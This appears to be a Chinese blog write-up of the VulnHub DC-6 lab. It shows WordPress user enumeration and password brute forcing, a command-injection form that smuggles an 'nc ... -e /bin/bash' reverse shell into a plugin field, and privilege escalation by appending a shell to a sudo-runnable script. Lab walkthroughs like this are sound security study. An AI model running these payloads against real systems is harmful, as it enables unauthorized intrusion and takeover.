前言
⏰时间:2023.7.31
🗺️靶机地址: https://download.vulnhub.com/dc/DC-6.zip
⚠️文中涉及操作均在靶机模拟环境中完成,切勿未经授权用于真实环境。
🙏本人水平有限,如有错误望指正,感谢您的查阅!
🎉欢迎关注🔍点赞👍收藏⭐️留言📝
信息收集
nmap发现主机
┌──(root㉿Erik)-[/home/eric/myfile]
└─# nmap -sn 192.168.58.1/24
Starting Nmap 7.94 ( https://nmap.org ) at 2023-07-31 17:11 HKT
Nmap scan report for 192.168.58.1
Host is up (0.0018s latency).
MAC Address: 00:50:56:C0:00:08 (VMware)
Nmap scan report for 192.168.58.2
Host is up (0.000086s latency).
MAC Address: 00:50:56:EB:56:98 (VMware)
Nmap scan report for 192.168.58.166
Host is up (0.00019s latency).
nmap探测端口banner
┌──(root㉿Erik)-[/home/eric/myfile]
└─# nmap -A -T4 -p- 192.168.58.166
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)
| ssh-hostkey:
| 2048 3e:52:ce:ce:01:b6:94:eb:7b:03:7d:be:08:7f:5f:fd (RSA)
| 256 3c:83:65:71:dd:73:d7:23:f8:83:0d:e3:46:bc:b5:6f (ECDSA)
|_ 256 41:89:9e:85:ae:30:5b:e0:8f:a4:68:71:06:b4:15:ee (ED25519)
80/tcp open http Apache httpd 2.4.25 ((Debian))
|_http-title: Did not follow redirect to http://wordy/
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.25 (Debian)
MAC Address: 00:0C:29:44:6B:A1 (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Uptime guess: 199.637 days (since Fri Jan 13 01:55:01 2023)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=260 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
这里需要将目标地址与域名wordy写入hosts文件
echo '192.168.58.166 wordy'|tee -a /etc/hosts
访问http://wordy
扫目录扫
dirsearch -u http://wordy
[17:34:55] 301 - 301B - /wp-admin -> http://wordy/wp-admin/
[17:34:55] 302 - 0B - /wp-admin/ -> http://wordy/wp-login.php?redirect_to=http%3A%2F%2Fwordy%2Fwp-admin%2F&reauth=1
[17:34:55] 200 - 0B - /wp-config.php
[17:34:55] 500 - 3KB - /wp-admin/setup-config.php
[17:34:55] 400 - 1B - /wp-admin/admin-ajax.php
[17:34:55] 301 - 303B - /wp-content -> http://wordy/wp-content/
[17:34:55] 200 - 0B - /wp-content/
[17:34:55] 200 - 1KB - /wp-admin/install.php
[17:34:55] 403 - 316B - /wp-content/plugins/akismet/admin.php
[17:34:55] 403 - 318B - /wp-content/plugins/akismet/akismet.php
[17:34:55] 500 - 0B - /wp-content/plugins/hello.php
[17:34:55] 301 - 304B - /wp-includes -> http://wordy/wp-includes/
[17:34:55] 500 - 0B - /wp-includes/rss-functions.php
[17:34:55] 200 - 42KB - /wp-includes/
[17:34:55] 200 - 0B - /wp-cron.php
[17:34:55] 200 - 3KB - /wp-login.php
[17:34:55] 302 - 0B - /wp-signup.php -> http://wordy/wp-login.php?action=register
存在登录页面
使用wpscan枚举用户名
┌──(root㉿Erik)-[/home/eric/myfile]
└─# wpscan --url wordy -eu
[i] User(s) Identified:
[+] admin
| Found By: Rss Generator (Passive Detection)
| Confirmed By:
| Wp Json Api (Aggressive Detection)
| - http://wordy/index.php/wp-json/wp/v2/users/?per_page=100&page=1
| Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Login Error Messages (Aggressive Detection)
[+] graham
| Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Confirmed By: Login Error Messages (Aggressive Detection)
[+] sarah
| Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Confirmed By: Login Error Messages (Aggressive Detection)
[+] mark
| Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Confirmed By: Login Error Messages (Aggressive Detection)
[+] jens
| Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Confirmed By: Login Error Messages (Aggressive Detection)
提取用户名到users.txt
┌──(root㉿Erik)-[/home/eric/myfile]
└─# wpscan --url wordy -eu|cut -d ' ' -f2|grep -Eo '^([a-z])*'|tee users.txt
admin
sarah
jens
graham
mark
wpscan爆破
┌──(root㉿Erik)-[/home/eric/myfile]
└─# wpscan -U users.txt -P passwd.txt --max-threads 50 --url http://wordy
[+] Performing password attack on Xmlrpc against 5 user/s
[SUCCESS] - mark / helpdesk01
Trying graham / helpdesk01 Time: 00:00:00 <================================ > (5 / 6) 83.33% ETA: ??:??:??
[!] Valid Combinations Found:
| Username: mark, Password: helpdesk01
密码是helpdesk01
修改部分内容
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://wordy/wp-admin/admin.php?page=plainview_activity_monitor&tab=activity_tools" method="POST" enctype="multipart/form-data">
<input type="hidden" name="ip" value="google.fr| nc 192.168.58.153 9999 -e /bin/bash" />
<input type="hidden" name="lookup" value="Lookup" />
<input type="submit" value="Submit request" />
</form>
</body>
设置监听
┌──(root㉿Erik)-[/tmp]
└─# nc -nvlp 9999
listening on [any] 9999 ...
访问/tmp/45274.html
python拿到稳定shell
python -c 'import pty;pty.spawn("/bin/bash")'
进入mark家目录,发现提示
www-data@dc-6:/home/mark$ ls -la
total 28
drwxr-xr-x 3 mark mark 4096 Apr 26 2019 .
drwxr-xr-x 6 root root 4096 Apr 26 2019 ..
-rw------- 1 mark mark 5 Apr 26 2019 .bash_history
-rw-r--r-- 1 mark mark 220 Apr 24 2019 .bash_logout
-rw-r--r-- 1 mark mark 3526 Apr 24 2019 .bashrc
-rw-r--r-- 1 mark mark 675 Apr 24 2019 .profile
drwxr-xr-x 2 mark mark 4096 Apr 26 2019 stuff
www-data@dc-6:/home/mark$ cd stuff
www-data@dc-6:/home/mark/stuff$ ls
things-to-do.txt
www-data@dc-6:/home/mark/stuff$ cat things-to-do.txt
Things to do:
- Restore full functionality for the hyperdrive (need to speak to Jens)
- Buy present for Sarah's farewell party
- Add new user: graham - GSo7isUM1D4 - done
- Apply for the OSCP course
- Buy new laptop for Sarah's replacement
先创建graham用户
useradd graham
passwd graham
su graham
在Jens的目录里找到backups.sh
文件拥有者是jens
graham@dc-6:/home/jens$ cat backups.sh
#!/bin/bash
tar -czf backups.tar.gz /var/www/html
graham@dc-6: echo '/bin/bash' >> backups.sh
graham@dc-6:/home/jens$ cat backups.sh
#!/bin/bash
tar -czf backups.tar.gz /var/www/html
/bin/bash
sudo 到jens
sudo -u jens /home/jens/backups.sh
sudo -l发现nmap具备s权限,参考https://gtfobins.github.io/gtfobins/nmap/
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
